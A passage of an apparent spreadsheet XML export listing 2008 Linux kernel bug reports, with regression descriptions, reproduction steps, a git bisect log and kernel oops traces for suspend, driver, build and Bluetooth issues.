    <t>2008-06-15 13:50 UTC</t>
  </si>
  <si>
    <t>2008-10-27 15:23 UTC</t>
  </si>
  <si>
    <t>Steps to reproduce: Trigger bus resets with firecontrol or any other way. After the bus generation went from 255 to 0 or from 0 to 1, the machine freezes. This has been observed with different controllers.</t>
  </si>
  <si>
    <t>System turns off during wake from S3, Wake Regression from 2.6.25 (SMP related)</t>
  </si>
  <si>
    <t>2.6.26rc8</t>
  </si>
  <si>
    <t>2008-06-15 16:24 UTC</t>
  </si>
  <si>
    <t>2008-07-06 00:33 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.6 Earliest failing kernel version: 2.6.26rc6 (not tested in between) Distribution: Ubuntu 8.04 Hardware Environment: Acer Extensa 5220 Software Environment: KDE/single user mode Problem Description: When the system is put into standby mode and then resumed, it seems to try to resume for a while but then turns off completely before anything can be seen. Steps to reproduce: Suspend System, Resume system. Check here for my boot logs with 2.6.26rc6: http://bugzilla.kernel.org/show_bug.cgi?id=10914 Dmesg with 2.6.25.6 will be attached for comparison.</t>
  </si>
  <si>
    <t>Memory reader not working with kernel &gt;2.6.24 but works with kernel 2.6.23 and 2.6.22!</t>
  </si>
  <si>
    <t>&gt;= 2.6.24</t>
  </si>
  <si>
    <t>2008-06-16 01:58 UTC</t>
  </si>
  <si>
    <t>Ali Abdallah</t>
  </si>
  <si>
    <t>Latest working kernel version: ------------------------------ My memory stick reader used to work with kernel version 2.6.22.x and 2.6.23.x, but not with 2.6.20.x ( not tested with 2.6.21.x) . Earliest failing kernel version: -------------------------------- &gt;=2.6.24 Distribution: ------------- Slackware 12.1, and Ubuntu 8.04 Hardware Environment: ---------------------- 06:00.0 FLASH memory: ENE Technology Inc ENE PCI Memory Stick Card Reader Controller 06:00.1 SD Host controller: ENE Technology Inc ENE PCI SmartMedia / xD Card Reader Controller 06:00.2 FLASH memory: ENE Technology Inc Unknown device 0720 06:00.3 FLASH memory: ENE Technology Inc ENE PCI Secure Digital / MMC Card Reader Controller Software Environment: Problem Description: when inserting a memory card in the reader, nothing comes from /var/log/messages but dmesg shows mmc1: unrecognised SCR structure version 1 mmc1: error -22 whilst initialising SD card searching over the net i didn't find anything useful, but it seems this SCR checking is only implemented in sd.c source with kernel version &gt;=2.6.24, the card works perfectly with 2.6.23.x and with 2.6.22.x</t>
  </si>
  <si>
    <t>Kernels &gt;=v2.6.24 (maybe 2.6.23) can't load ip_conntrack modules</t>
  </si>
  <si>
    <t>2008-06-16 06:46 UTC</t>
  </si>
  <si>
    <t>Tobias Klausmann</t>
  </si>
  <si>
    <t>2008-06-22 00:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22 Earliest failing kernel version: 2.6.24 Distribution: Gentoo Hardware Environment: Compaq Alphaserver ES40 Software Environment: kernel/iptables Problem Description: Iptables conntrack modules can't be loaded. Error message: Jun 16 15:37:31 monolith module nf_conntrack: Relocation (type 17) overflow vs per_cpu__nf_conntrack_stat Jun 16 15:37:31 monolith modprobe: WARNING: Error inserting nf_conntrack (/lib/modules/2.6.24.7/kernel/net/netfilter/nf_conntrack.ko): Invalid module format Jun 16 15:37:31 monolith xt_state: Unknown symbol nf_conntrack_untracked Jun 16 15:37:31 monolith xt_state: Unknown symbol nf_ct_l3proto_module_put Jun 16 15:37:31 monolith xt_state: Unknown symbol nf_ct_l3proto_try_module_get Jun 16 15:37:31 monolith modprobe: FATAL: Error inserting xt_state (/lib/modules/2.6.24.7/kernel/net/netfilter/xt_state.ko): Unknown symbol in module, or unknown parameter (see dmesg) Dmesg output doesn't have any additional info. Since Conntracking doesn't work, iptables is pretty much unusable. I also tried (re)starting configuration from scratch, to no avail.</t>
  </si>
  <si>
    <t>Dell laptops: reboot instead of resume</t>
  </si>
  <si>
    <t>2008-06-16 07:31 UTC</t>
  </si>
  <si>
    <t>Kirill A. Shutemov</t>
  </si>
  <si>
    <t>2008-07-13 10:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.25-611-gf49688d Earliest failing kernel version: v2.6.25-612-ge44b7b7 Distribution: ALT Linux Sisyphus Hardware Environment: Dell XPS M1210 After I type 'echo mem &gt; /sys/power/state' the kernel seems to go to S3 but when I press the button to wake the system restarts like in case of a power on. I have bisected the bug: git-bisect start # bad: [7775c9753b94fe429dc4323360d6502c95e0dd6e] Merge git://git.kernel.org/pub/scm/linux/kernel/git/kyle/parisc-2.6 git-bisect bad 7775c9753b94fe429dc4323360d6502c95e0dd6e # good: [e478bec0ba0a83a48a0f6982934b6de079e7e6b3] Linux v2.6.18. Arrr! git-bisect good e478bec0ba0a83a48a0f6982934b6de079e7e6b3 # good: [bc31d3b2c7d7f2a03721a05cb3c9a3ce8b1e2e5a] [IPSEC] ah: Remove keys from ah_data structure git-bisect good bc31d3b2c7d7f2a03721a05cb3c9a3ce8b1e2e5a # good: [bc31d3b2c7d7f2a03721a05cb3c9a3ce8b1e2e5a] [IPSEC] ah: Remove keys from ah_data structure git-bisect good bc31d3b2c7d7f2a03721a05cb3c9a3ce8b1e2e5a # good: [d21b05f101ae732d9bc322f13eea2f59c0aa60f5] rdma: SVCRMDA Header File git-bisect good d21b05f101ae732d9bc322f13eea2f59c0aa60f5 # good: [d21b05f101ae732d9bc322f13eea2f59c0aa60f5] rdma: SVCRMDA Header File git-bisect good d21b05f101ae732d9bc322f13eea2f59c0aa60f5 # bad: [7cea51be4e91edad05bd834f3235b45c57783f0d] security: fix up documentation for security_module_enable git-bisect bad 7cea51be4e91edad05bd834f3235b45c57783f0d # good: [989b0b930218661b504bbb056b309e2c7bcdfb86] Merge branch 'release' of git://git.kernel.org/pub/scm/linux/kernel/git/czankel/xtensa-2.6 git-bisect good 989b0b930218661b504bbb056b309e2c7bcdfb86 # good: [989b0b930218661b504bbb056b309e2c7bcdfb86] Merge branch 'release' of git://git.kernel.org/pub/scm/linux/kernel/git/czankel/xtensa-2.6 git-bisect good 989b0b930218661b504bbb056b309e2c7bcdfb86 # good: [fb8c7fb25d7d754a992481e9f763ec0b5889c4d9] Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/x86/linux-2.6-x86 git-bisect good fb8c7fb25d7d754a992481e9f763ec0b5889c4d9 # good: [fb8c7fb25d7d754a992481e9f763ec0b5889c4d9] Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/x86/linux-2.6-x86 git-bisect good fb8c7fb25d7d754a992481e9f763ec0b5889c4d9 # good: [72f74fa25a468f40781e452f1d2528395090d55f] include/asm-x86/ptrace.h: checkpatch cleanups - formatting only git-bisect good 72f74fa25a468f40781e452f1d2528395090d55f # bad: [07fe944e87d79f8d7e1b090913fe9f2ace78f41d] Merge branch 'next' of git://git.kernel.org/pub/scm/linux/kernel/git/djbw/async_tx git-bisect bad 07fe944e87d79f8d7e1b090913fe9f2ace78f41d # good: [d7bb545d86825e635cab33a1dd81ca0ad7b92887] Merge branch 'semaphore' of git://git.kernel.org/pub/scm/linux/kernel/git/willy/misc git-bisect good d7bb545d86825e635cab33a1dd81ca0ad7b92887 # good: [746f2244065ddfbe0c5d339e309db4d2b48f185b] x86: unify arch/x86/kernel/mpparse_64.c git-bisect good 746f2244065ddfbe0c5d339e309db4d2b48f185b # good: [17c5aab5b34e351531466e35b154ca86db7d46a9] sata_mv cosmetics git-bisect good 17c5aab5b34e351531466e35b154ca86db7d46a9 # bad: [9732b6112343df2872518ec6701c8ef729310a05] Merge git://git.kernel.org/pub/scm/linux/kernel/git/mingo/linux-2.6-kgdb git-bisect bad 9732b6112343df2872518ec6701c8ef729310a05 # bad: [e44b7b7525ad9d43163ab5e60c784325419e0ea6] x86: move suspend wakeup code to C git-bisect bad e44b7b7525ad9d43163ab5e60c784325419e0ea6 # good: [03056c88cf65ec8375753900246b36ae1c4b8a33] x86: remove superfluous initialisation in boot code. git-bisect good 03056c88cf65ec8375753900246b36ae1c4b8a33 # good: [6107a7c4e2a871c37bb6c49e5e8286079f0968f9] x86: use cpu_online() git-bisect good 6107a7c4e2a871c37bb6c49e5e8286079f0968f9 # good: [df96323dfaebdf7e17cdf0656096e6ab2158ec76] x86: section mismatch fixes, #1 git-bisect good df96323dfaebdf7e17cdf0656096e6ab2158ec76 # good: [f49688d459c5eaa62db3597cbfd3cb13e361d415] x86: coding style fixes to arch/x86/kernel/acpi/sleep.c git-bisect good f49688d459c5eaa62db3597cbfd3cb13e361d415 Steps to reproduce: 1. echo mem &gt; /sys/power/state 2. press power button.</t>
  </si>
  <si>
    <t>v9fs mount options are not preserved</t>
  </si>
  <si>
    <t>2008-06-19 14:20 UTC</t>
  </si>
  <si>
    <t>2012-05-22 12:36 UTC</t>
  </si>
  <si>
    <t>After mounting with v9fs, the options are messed up: # mount -t 9p -o trans=unix,dfltuid=1000,dfltgid=1000,uname=sqweek,noextend /tmp/ns.sqweek.:0/wren /tmp/wren # mount |grep /tmp/wren /tmp/ns.sqweek.:0/wren on /tmp/wren type 9p (rw,sync,dirsynctrans=unix) I'm guessing that's supposed to be dirsync,trans=unix at the very least. -sqweek</t>
  </si>
  <si>
    <t>2.6.26-rc7: x86 build error</t>
  </si>
  <si>
    <t>2.6.26-rc7</t>
  </si>
  <si>
    <t>2008-06-21 03:03 UTC</t>
  </si>
  <si>
    <t>2008-06-22 10:39 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc7: x86 build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/6/21/31</t>
  </si>
  <si>
    <t>Henrik Rydberg</t>
  </si>
  <si>
    <t>alpha build failure</t>
  </si>
  <si>
    <t>2.6.26-rc7-git</t>
  </si>
  <si>
    <t>2008-06-22 02:13 UTC</t>
  </si>
  <si>
    <t>2008-06-24 12:29 UTC</t>
  </si>
  <si>
    <t>Subject : alpha build failure Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/6/22/18</t>
  </si>
  <si>
    <t>v2.6.26-rc7: BUG: unable to handle kernel NULL pointer dereference</t>
  </si>
  <si>
    <t>2008-06-22 10:45 UTC</t>
  </si>
  <si>
    <t>2008-06-30 13:43 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.26-rc7: BUG: unable to handle kernel NULL pointer dereference Submitter : Vegard Nossum &lt;vegard.nossum@gmail.com&gt; Date : 2008-06-22 12:56 References : http://marc.info/?l=linux-kernel&amp;m=121413950227884&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pata_pcmcia with Sandisk Extreme III 8GB</t>
  </si>
  <si>
    <t>2008-06-22 10:52 UTC</t>
  </si>
  <si>
    <t>2008-09-23 03:30 UTC</t>
  </si>
  <si>
    <t>Subject : [KERNEL 2.6.26-rc4] bugreport : pata_pcmcia with Sandisk Extreme III 8GB Submitter : Komuro &lt;komurojun-mbn@nifty.com&gt; Date : 2008-06-07 13:37 References : http://marc.info/?l=linux-kernel&amp;m=121284627119861&amp;w=4 Handled-By : Tejun Heo &lt;htejun@gmail.com&gt; Handled-By : Dominik Brodowski &lt;linux@dominikbrodowski.net&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>LMSENSORS: 2.6.26-rc, enabling ACPI Termal Zone support costs sensors</t>
  </si>
  <si>
    <t>2008-06-22 11:10 UTC</t>
  </si>
  <si>
    <t>2008-07-06 09:41 UTC</t>
  </si>
  <si>
    <t>Subject : LMSENSORS: 2.6.26-rc, enabling ACPI Termal Zone support costs sensors Submitter : Rene Herman &lt;rene.herman@keyaccess.nl&gt; Date : 2008-06-22 0:47 References : http://marc.info/?l=linux-kernel&amp;m=121409569819064&amp;w=4 Handled-By : Hans de Goede &lt;j.w.r.degoede@hhs.nl&gt; Handled-By : Rene Herman &lt;rene.herman@keyaccess.nl&gt; Patch : http://lkml.org/lkml/2008/6/22/83 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc: nfsd hangs for a few sec</t>
  </si>
  <si>
    <t>2008-06-22 11:26 UTC</t>
  </si>
  <si>
    <t>2008-07-05 13:09 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc: nfsd hangs for a few sec Submitter : "Alexander Beregalov" &lt;a.beregalov@gmail.com&gt; Date : 2008-06-21 12:57 References : http://marc.info/?l=linux-kernel&amp;m=121405308328004&amp;w=4 References : http://marc.info/?l=linux-kernel&amp;m=121412880115289&amp;w=4 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Handled-By : Mel Gorman &lt;mel@csn.ul.ie&gt; Handled-By : Christoph Lameter &lt;clameter@sgi.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ymfpci: can't play sounds with bitrate 44100</t>
  </si>
  <si>
    <t>2.6.25.7</t>
  </si>
  <si>
    <t>2008-06-22 11:52 UTC</t>
  </si>
  <si>
    <t>2008-07-14 14:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.17 Earliest failing kernel version: 2.6.24-rc5 Distribution: ubuntu 8.04 Hardware Environment: Vaio SR17 Software Environment: sox play, mpg123, vlc, mplayer etc. Problem Description: Starting with 2.6.24-rc5 and continuing at least through 2.6.25.7, any sound (wav, ogg vorbis, mp3) with a bitrate of 44100 (the default for files ripped from CD) plays at zero volume -- there's no way to play these files. Steps to reproduce: Play (e.g. with /usr/bin/play from sox, or any other media player) a file that uses that bitrate (I'll attach a sample). Observe that the player seems to think it's playing something, but no sound comes out. Reverting sound/pci/ymfpci/ymfpci_main.c to the ymfpci_main.c from 2.6.23.17 cures the problem, and makes those files play properly again.</t>
  </si>
  <si>
    <t>system hang on closing T60 panel lid when in dual screen mode 2.6.26 regression</t>
  </si>
  <si>
    <t>2.6.26~rc7</t>
  </si>
  <si>
    <t>2008-06-23 09:10 UTC</t>
  </si>
  <si>
    <t>2008-07-02 09:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: ? 2.6.26~rc5 (previous RCs not tested). Distribution: Debian/testing Hardware Environment: Thinkpad T60 (Intel video chipset) Software Environment: Kernel from http://kernel-archive.buildserver.net/debian-kernel/ Problem Description: If I close my laptop's panel when I have an external monitor attached and enabled, my laptop freeze... i have to power it off. Steps to reproduce: Plug an external screen to a Thinkpad T60 laptop (based on intel 945 chipset). Then boot the laptop, and log into gnome. Make sure that : 1. Both screen are enabled (xrandr --auto). 2. Gnome power setting has : "When laptop lid is closed" = "Blank Screen" 3. Close the laptop's panel. =&gt; The laptop is now frozen. It occurs when : using linux-image-2.6.26-rc5, rc6 or rc7. Does not occurs with : linux-image-2.6.24 , 2.6.25 from Debian/testing. Occurs if gnome has "When laptop lid is closed" = "Blank Screen" Doesn't occur if it's set to "Do nothing" Occurs on my T60, with : Intel 945GM/PM/GMS Express Memory Controller Hub [8086:27a0] Intel 945GM/GMS Express Integrated Graphics Controller [8086:27a2] Does NOT occur on a T61, with Intel GM965/GL960 Integrated Graphics Controller [8086:2a02] Intel GM965/GL960 Integrated Graphics Controller [8086:2a03] Occurs when both output are enable (﻿crt=on + lvds=on) Doen not occurs when only one of the screens are enabled (crt=on + lvds=off OR ﻿crt=off + lvds=on). Note : The laptop can suspend or hibernate, then resumes correctly. Running gnome screensaver is ok (but gnome doesn't seems to want to put the screens in powersave mode). More information about that bug is available at http://bugs.debian.org/487672</t>
  </si>
  <si>
    <t>[REGRESSION] kernel freezes reinitializing SMP CPU</t>
  </si>
  <si>
    <t>2008-11-10 01:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22? Earliest failing kernel version: unk Distribution: Debian testing Hardware Environment: HP Compaq 6910p, Core2Duo Software Environment: Debian testing, vanilla 2.6.25.6, i386 kernel Problem Description: kernel freezes doing echo 0 &gt; /sys/devices/system/cpu/cpu1/online Everythink is ok, I see only 1 cpu in /proc/cpuinfo echo 1 &gt; /sys/devices/system/cpu/cpu1/online Immeditial freeze! Steps to reproduce: Write commands</t>
  </si>
  <si>
    <t>p4-clockmod reports false frequency</t>
  </si>
  <si>
    <t>2008-06-23 10:11 UTC</t>
  </si>
  <si>
    <t>Matthias-Christian Ott</t>
  </si>
  <si>
    <t>2011-07-30 05:47 UTC</t>
  </si>
  <si>
    <t># uname -a Linux hyperix 2.6.25.7 #2 Sat Jun 21 14:12:02 CEST 2008 i686 Intel(R) Pentium(R) 4 CPU 1.80GHz GenuineIntel GNU/Linux # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 1 model name : Intel(R) Pentium(R) 4 CPU 1.80GHz stepping : 2 cpu MHz : 3650.000 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pebs bts bogomips : 3603.33 clflush size : 64 # cpufreq-info cpufrequtils 0.4: cpufreq-info (C) Dominik Brodowski 2004 Report errors and bugs to linux@brodo.de, please. analyzing CPU 0: driver: p4-clockmod CPUs which need to switch frequency at the same time: 0 hardware limits: 3.65 GHz - 14.60 GHz available frequency steps: 3.65 GHz, 5.48 GHz, 7.30 GHz, 9.13 GHz, 10.95 GHz, 12.78 GHz, 14.60 GHz available cpufreq governors: ondemand, userspace current policy: frequency should be within 3.65 GHz and 14.60 GHz. The governor "ondemand" may decide which speed to use within this range. current CPU frequency is 5.48 GHz (asserted by call to hardware). Latest working kernel version: 2.6.23 (last version that I tried) Any suggestions? To me it seems that the bit shift width is incorrect. I had a similar problems years ago and fixed by adding a different bit shift width for Pentium 4 Model 0 and 1.</t>
  </si>
  <si>
    <t>Xen build error</t>
  </si>
  <si>
    <t>Xen</t>
  </si>
  <si>
    <t>2008-06-24 00:51 UTC</t>
  </si>
  <si>
    <t>2008-06-24 12:30 UTC</t>
  </si>
  <si>
    <t>virtualization_xen</t>
  </si>
  <si>
    <t>Subject : Xen build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/6/24/78</t>
  </si>
  <si>
    <t>pcmcia: CIS filename is too long [GLOBETROTTER.cis]</t>
  </si>
  <si>
    <t>2008-06-24 02:41 UTC</t>
  </si>
  <si>
    <t>2010-10-05 13:53 UTC</t>
  </si>
  <si>
    <t>Problem Description: with a Dynamode Data/Fax Modem 16-bit PCMCIA card, dmesg gives: pcmcia: CIS filename is too long [GLOBETROTTER.cis] (was reported here: http://puppylinux.com/blog/?viewDetailed=00160 and seems to be pretty old (my guess is it has always been this way...)) I assume it comes from line 922 of drivers/serial/serial_cs.c : PCMCIA_DEVICE_CIS_MANF_CARD(0x0013, 0x0000, "GLOBETROTTER.cis"), where "GLOBETROTTER.cis" is 16 chars long... PCMCIA_DEVICE_CIS_MANF_CARD is defined at the top of include/pcmcia/device_id.h, where card_id is used, defined in include/pcmcia/ds.h as u16 (I hope I got this right... I don't really know what I'm talking about.).</t>
  </si>
  <si>
    <t>Soft lockup on (intentionally) corrupted filesystem</t>
  </si>
  <si>
    <t>2.6.25.8 + patches for bug 10882 problems</t>
  </si>
  <si>
    <t>2008-06-24 12:42 UTC</t>
  </si>
  <si>
    <t>2008-09-26 06:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid (unstable) Hardware Environment: qemu x86 Software Environment: Minimal Debian sid Problem Description: Mounting one of the attached intentionally corrupted ext3 filesystems and accessing it causes a soft lockup. I believe they probably are the same bug (both happen in __log_wait_for_space()), but the backtraces vary quite a bit so I attach two test cases. My kernel is 2.6.25.8 + three patches posted by Duane Griffin for #10882, namely (I hope I understand the git terminology right, at least you can grep lkml archives for these): - 6ae4ecf..8019bf2 - 7712682..bc030f4 - 0b8cf80..ea0236b Steps to reproduce: 1. bunzip2 one of the filesystem images 2. mount fs.img /mnt 3. ls /mnt</t>
  </si>
  <si>
    <t>[PATCH, TRIVIAL]Zephyr BioHarness usb id not in cp2101 driver</t>
  </si>
  <si>
    <t>2.6.20 (also Linus git HEAD as of 2008-06-25)</t>
  </si>
  <si>
    <t>2008-06-25 06:35 UTC</t>
  </si>
  <si>
    <t>2012-05-22 12:39 UTC</t>
  </si>
  <si>
    <t>I have a Zephyr BioHarness (http://www.zephyrtech.co.nz/products/professional/bioharness) that I'm trying to get working under Linux. They're using a cp2101 chip internally to do usb&lt;-&gt;serial stuff, but with a usb id not previously mentioned as supported by the driver (checked against current linus git tree).</t>
  </si>
  <si>
    <t>2.6.26-rc8</t>
  </si>
  <si>
    <t>kernel oopses when wiggling the mouse to make it known to hidd</t>
  </si>
  <si>
    <t>2.6.26-rc7-00051-g62786b9</t>
  </si>
  <si>
    <t>2008-06-26 10:32 UTC</t>
  </si>
  <si>
    <t>Daniel Vetter</t>
  </si>
  <si>
    <t>2008-10-06 09:00 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc5 Earliest failing kernel version: Distribution: Debian unstable Hardware Environment: amd64 2x Dual Core Opteron Software Environment: Problem Description: While booting up, when wiggling the mouse at the right moment (to make hidd notice and configure it), the kernel crashes with an oops. Sometimes the bluetooth deamons just crashes, and then the kernel oopses when trying to shutdown the system or when trying to restart the bluetooth tools. The mouse is a Logitech MX900 with the MX900 bluetooth usb dongle. Steps to reproduce: Crash seems to be a race, most often it works flawless. Bisecting the problem doesn't work because I have not found out a way to reliably reproduce the crash. Relevant portions of the dmesg when crashing while booting and mouse-wiggling (via serial-console): [ 180.691199] Bluetooth: L2CAP ver 2.9 [ 180.695294] Bluetooth: L2CAP socket layer initialized [ 180.763617] Bluetooth: HIDP (Human Interface Emulation) ver 1.2 [ 181.272621] Bluetooth: RFCOMM socket layer initialized [ 181.294815] Bluetooth: RFCOMM TTY layer initialized [ 181.300399] Bluetooth: RFCOMM ver 1.8 [ 181.792272] kobject_add_internal failed for acl0007610D7C7E with -EEXIST, do. [ 181.806802] Pid: 5158, comm: btaddconn Not tainted 2.6.26-rc7-00051-g62786b96 [ 181.814798] [ 181.814799] Call Trace: [ 181.818473] [&lt;ffffffff8035c2f7&gt;] ? kobject_put+0x27/0x60 [ 181.825841] [&lt;ffffffff8035c662&gt;] kobject_add_internal+0x112/0x1c0 [ 181.833846] [&lt;ffffffff8035c7c4&gt;] kobject_add_varg+0x54/0x90 [ 181.841976] [&lt;ffffffffa0293cb0&gt;] ? :bluetooth:add_conn+0x0/0x90 [ 181.849829] [&lt;ffffffff8035c8f9&gt;] kobject_add+0x69/0x90 [ 181.857407] [&lt;ffffffff80260371&gt;] ? trace_hardirqs_on+0x121/0x170 [ 181.861516] [&lt;ffffffff8024d802&gt;] ? flush_cpu_workqueue+0x82/0xa0 [ 181.875179] [&lt;ffffffff8025e369&gt;] ? get_lock_stats+0x19/0x70 [ 181.879189] [&lt;ffffffff8035c4aa&gt;] ? kobject_get+0x1a/0x30 [ 181.888821] [&lt;ffffffff803ddb17&gt;] ? get_device+0x17/0x20 [ 181.892830] [&lt;ffffffff803de521&gt;] device_add+0xe1/0x630 [ 181.899005] [&lt;ffffffff8035abf9&gt;] ? __next_cpu+0x19/0x30 [ 181.907194] [&lt;ffffffffa0293cb0&gt;] ? :bluetooth:add_conn+0x0/0x90 [ 181.919084] [&lt;ffffffffa0293cd9&gt;] :bluetooth:add_conn+0x29/0x90 [ 181.923974] [&lt;ffffffff8024d3e5&gt;] run_workqueue+0xf5/0x240 [ 181.931983] [&lt;ffffffff8024d5d7&gt;] worker_thread+0xa7/0x120 [ 181.935951] [&lt;ffffffff80251ac0&gt;] ? autoremove_wake_function+0x0/0x40 [ 181.943954] [&lt;ffffffff8024d530&gt;] ? worker_thread+0x0/0x120 [ 181.948393] [&lt;ffffffff80251719&gt;] kthread+0x49/0x80 [ 181.956268] [&lt;ffffffff8020d478&gt;] child_rip+0xa/0x12 [ 181.964275] [&lt;ffffffff8020cb63&gt;] ? restore_args+0x0/0x30 [ 181.967361] [&lt;ffffffff802516d0&gt;] ? kthread+0x0/0x80 [ 181.972072] [&lt;ffffffff8020d46e&gt;] ? child_rip+0x0/0x12 [ 181.982170] [ 181.982694] add_conn: Failed to register connection device [ 181.989678] kobject_add_internal failed for acl0007610D7C7E with -EEXIST, do. [ 182.002233] Pid: 5158, comm: btaddconn Not tainted 2.6.26-rc7-00051-g62786b96 [ 182.010379] [ 182.010379] Call Trace: [ 182.014406] [&lt;ffffffff8035c2f7&gt;] ? kobject_put+0x27/0x60 [ 182.023722] [&lt;ffffffff8035c662&gt;] kobject_add_internal+0x112/0x1c0 [ 182.034150] [&lt;ffffffff8035c7c4&gt;] kobject_add_varg+0x54/0x90 [ 182.038164] [&lt;ffffffffa0293cb0&gt;] ? :bluetooth:add_conn+0x0/0x90 [ 182.046994] [&lt;ffffffff8035c8f9&gt;] kobject_add+0x69/0x90 [ 182.049975] [&lt;ffffffff80260371&gt;] ? trace_hardirqs_on+0x121/0x170 [ 182.058809] [&lt;ffffffff8024d802&gt;] ? flush_cpu_workqueue+0x82/0xa0 [ 182.063473] [&lt;ffffffff8025e369&gt;] ? get_lock_stats+0x19/0x70 [ 182.072313] [&lt;ffffffff8035c4aa&gt;] ? kobject_get+0x1a/0x30 [ 182.076324] [&lt;ffffffff803ddb17&gt;] ? get_device+0x17/0x20 [ 182.082138] [&lt;ffffffff803de521&gt;] device_add+0xe1/0x630 [ 182.087519] [&lt;ffffffff8035abf9&gt;] ? __next_cpu+0x19/0x30 [ 182.096994] [&lt;ffffffffa0293cb0&gt;] ? :bluetooth:add_conn+0x0/0x90 [ 182.101338] [&lt;ffffffffa0293cd9&gt;] :bluetooth:add_conn+0x29/0x90 [ 182.110184] [&lt;ffffffff8024d3e5&gt;] run_workqueue+0xf5/0x240 [ 182.114398] [&lt;ffffffff8024d5d7&gt;] worker_thread+0xa7/0x120 [ 182.119826] [&lt;ffffffff80251ac0&gt;] ? autoremove_wake_function+0x0/0x40 [ 182.128673] [&lt;ffffffff8024d530&gt;] ? worker_thread+0x0/0x120 [ 182.138404] [&lt;ffffffff80251719&gt;] kthread+0x49/0x80 [ 182.142554] [&lt;ffffffff8020d478&gt;] child_rip+0xa/0x12 [ 182.151788] [&lt;ffffffff8020cb63&gt;] ? restore_args+0x0/0x30 [ 182.155803] [&lt;ffffffff802516d0&gt;] ? kthread+0x0/0x80 [ 182.161261] [&lt;ffffffff8020d46e&gt;] ? child_rip+0x0/0x12 [ 182.170818] [ 182.172391] add_conn: Failed to register connection device [ 182.306041] BUG: unable to handle kernel NULL pointer dereference at 00000008 [ 182.450066] IP: [&lt;ffffffff8031423a&gt;] sysfs_find_dirent+0xa/0x40 [ 182.450066] PGD 7c0d4067 PUD 7c0d5067 PMD 0 [ 182.450066] Oops: 0000 [1] PREEMPT SMP [ 182.450066] CPU 3 [ 182.450066] Modules linked in: rfcomm hidp l2cap nls_iso8859_1 nls_cp437 vfas [ 182.450066] Pid: 7725, comm: hidd Not tainted 2.6.26-rc7-00051-g62786b9 #6 [ 182.450066] RIP: 0010:[&lt;ffffffff8031423a&gt;] [&lt;ffffffff8031423a&gt;] sysfs_find_0 [ 182.450066] RSP: 0018:ffff81007c171a48 EFLAGS: 00010296 [ 182.450066] RAX: 2222222222222222 RBX: ffffffff8057744f RCX: 2222222222222222 [ 182.450066] RDX: 2222222222222222 RSI: ffffffff8057744f RDI: 0000000000000000 [ 182.450066] RBP: ffff81007c171a58 R08: 0000000000000001 R09: 0000000000000003 [ 182.450066] R10: 0000000000000000 R11: 0000000000000001 R12: ffffffff8057744f [ 182.450066] R13: ffffffff805eb1e0 R14: ffff8101614b7910 R15: ffff8101614b7698 [ 182.450066] FS: 00007f720ab0f6e0(0000) GS:ffff8101614292c0(0000) knlGS:00000 [ 182.450066] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 182.450066] CR2: 0000000000000028 CR3: 000000007c04d000 CR4: 00000000000006e0 [ 182.450066] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 182.450066] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 182.450066] Process hidd (pid: 7725, threadinfo ffff81007c170000, task ffff8) [ 182.450066] Stack: ffffffff8057744f 0000000000000000 ffff81007c171a78 fffff0 [ 182.450066] 0000000000000000 ffff8101614b7760 ffff81007c171aa8 ffffffff80315 [ 182.450066] ffff8101614b7760 ffff8101614b7760 ffff8101614b7000 ffff81015d058 [ 182.450066] Call Trace: [ 182.450066] [&lt;ffffffff80314380&gt;] sysfs_get_dirent+0x30/0x80 [ 182.450066] [&lt;ffffffff80315c75&gt;] sysfs_remove_group+0x25/0xe0 [ 182.450066] [&lt;ffffffff803e3f27&gt;] dpm_sysfs_remove+0x17/0x20 [ 182.450066] [&lt;ffffffff803e4652&gt;] device_pm_remove+0x22/0x60 [ 182.450066] [&lt;ffffffff803de24a&gt;] device_del+0x1a/0x190 [ 182.450066] [&lt;ffffffff803de3d1&gt;] device_unregister+0x11/0x20 [ 182.450066] [&lt;ffffffff80403fbb&gt;] input_unregister_device+0x19b/0x1c0 [ 182.450066] [&lt;ffffffffa011f94d&gt;] :hid:hidinput_disconnect+0x3d/0x60 [ 182.450066] [&lt;ffffffffa01220ca&gt;] :hid:hidinput_connect+0x24fa/0x2530 [ 182.450066] [&lt;ffffffffa04d5c99&gt;] :hidp:hidp_add_connection+0x479/0x740 [ 182.450066] [&lt;ffffffff802b992f&gt;] ? fget+0x7f/0xa0 [ 182.450066] [&lt;ffffffffa04d6c0b&gt;] 